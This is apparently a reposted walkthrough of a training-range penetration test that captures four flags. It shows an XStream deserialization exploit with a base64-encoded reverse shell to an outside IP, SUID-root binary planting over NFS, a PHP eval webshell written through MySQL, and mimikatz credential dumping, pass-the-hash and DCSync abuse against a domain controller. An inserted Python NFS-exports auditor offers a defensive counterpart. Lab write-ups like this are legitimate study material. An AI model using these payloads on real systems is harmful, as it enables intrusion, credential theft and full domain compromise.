[Intranet Penetration] The most hand-holding Chunqiu Cloud Mirror (春秋云镜) Delivery range walkthrough notes

Contents

flag1

flag2

flag3 

flag4


flag1

Scan the external network with fscan

Anonymous FTP login

ftp 39.98.122.67
anonymous

get pom.xml 

pom.xml contains the xstream and Commons Collections (cc) dependencies

Visiting http://39.98.122.67:8080/ shows a web application

Fill in some arbitrary data and capture the request: the data is sent as XML, so XStream deserialization can be used to hit the CC dependency

 vulhub/xstream/CVE-2021-29505/README.zh-cn.md at master · vulhub/vulhub · GitHub

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1338 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"

Got a shell back.

Read flag1.

flag2

Use wget to download frp and fscan, scan the intranet, and set up a tunnel

172.22.13.14  this host
172.22.13.57  CentOS
172.22.13.28  OA system, MySQL weak password root/123456
172.22.13.6   WIN-DC, domain controller

The hint for the second stage says NFS is the way in

Scan port 2049

NFS exploitation

Download nfs_offline onto the target machine

nfs_offline_install.sh

wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb
sudo dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
sudo dpkg -i libtirpc-common_1.2.5-1_all.deb && \
sudo dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
sudo dpkg -i rpcbind_1.2.5-8_amd64.deb && \
sudo dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
sudo dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb
showmount -e 172.22.13.57

mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock

Write an SSH public key

ssh-keygen -t rsa -b 4096
cd /temp/home/joyce/
mkdir .ssh
cat /root/.ssh/id_rsa.pub >> /temp/home/joyce/.ssh/authorized_keys

Compile a malicious C file and make it SUID root

printf '#include <stdlib.h>\n#include <unistd.h>\nint main(void) { setgid(0); setuid(0); system("/bin/bash"); return 0; }\n' > root.c
gcc root.c -o root
chmod +s root

Connect over SSH with the private key and spawn an interactive shell

ssh -i /root/.ssh/id_rsa [email protected]
python3 -c 'import pty;pty.spawn("/bin/bash")'

Run the privilege escalation binary to get root

Read flag2.
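The SUID-root trick above works only because the share lets the client's root write files as root (the no_root_squash export option); with the default root_squash the binary would land owned by nobody. Added here as a defensive check, not part of the original writeup: a small Python auditor for /etc/exports that flags the options enabling this chain, run over a constructed sample exports file (the hosts and paths in it are assumptions).

```python
import re

# Constructed sample /etc/exports, illustrative only (not taken from the target). The
# last entry shows the classic typo: a space before "(...)" gives the named host the
# default options and hands "(rw,no_root_squash)" to every client.
SAMPLE_EXPORTS = """\
/            *(rw,no_root_squash,no_subtree_check)
/srv/share   172.22.13.0/24(rw,sync,root_squash)
/srv/backup  172.22.13.14(ro) @trusted(rw,anonuid=1000)
/srv/web     172.22.13.14 (rw,no_root_squash)
"""
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")

def parse_exports(text):
    """Yield (path, host, option-set) for every client clause in exports(5) syntax."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:] or ["*"]  # bare path exports to everyone
        for client in clients:
            match = CLIENT_RE.match(client)
            if match is None:  # unbalanced parenthesis, skip the clause
                continue
            host = match.group(1) or "*"  # "(opts)" with no host applies to all hosts
            options = {o.strip() for o in (match.group(2) or "").split(",") if o.strip()}
            yield path, host, options

def audit_export(path, host, options):
    """Return risk findings for one clause; root_squash is the default when absent."""
    findings = []
    if "no_root_squash" in options:
        findings.append("no_root_squash: client root writes as uid 0, so a SUID-root binary can be planted")
    if host.startswith("*"):
        findings.append("wildcard host: any client that reaches port 2049 may mount it")
    if path == "/":
        findings.append("whole root filesystem exported")
    if {"rw", "no_root_squash"} <= options and host.startswith("*"):
        findings.append("root-writable by anyone: effectively remote root on the server")
    return findings

def audit_exports(text):
    """Map (path, host) to findings for every risky clause; clean clauses are omitted."""
    report = {}
    for path, host, options in parse_exports(text):
        if findings := audit_export(path, host, options):
            report[(path, host)] = findings
    return report
```

Run `audit_exports(open("/etc/exports").read())` on the NFS server; the fix for the flagged clauses is to drop no_root_squash, restrict the host list, and export only the directory that needs sharing.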

flag3 

Next, attack the MySQL server found in the earlier intranet scan

Connect with Navicat as root/123456

show variables like "secure_file_priv";
show variables like "%general%";

The service turns out to be started by phpStudy, and MySQL is allowed to write files into the web directory

Write a webshell

select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";

Connect with AntSword

Read flag3.

 

flag4

WIN-DC still needs to be taken

First create a new user and RDP in so we can operate as an administrator

Upload mimikatz and dump the credentials

privilege::debug
sekurlsa::logonpasswords

Got the machine account's NTLM hash

Pass-the-hash to get SYSTEM

sekurlsa::pth /user:WIN-HAUWOLAO$ /domain:XIAORANG.LAB /ntlm:f50cf41c345d71bc9b862d3568f5b303

Collect information with BloodHound

WIN-HAUWOLAO has a session of CHENGLEI; CHENGLEI is a member of the ACL Admins group, and ACL Admins has WriteDacl on WIN-DC

mimikatz earlier also captured chenglei's hash

Grant chenglei DCSync rights

proxychains4 python dacledit.py xiaorang.lab/chenglei -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -rights DCSync -principal chenglei -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.13.6

Dump the domain admin's hash

proxychains4 impacket-secretsdump xiaorang.lab/[email protected] -hashes :0c00801c30594a1b8eaa889d237c5382 -just-dc-ntlm

Pass-the-hash lateral movement

proxychains4 python psexec.py -hashes :6341235defdaed66fb7b682665752c9a XIAORANG/[email protected]

Read flag4.

Reposted from blog.csdn.net/uuzeray/article/details/142283124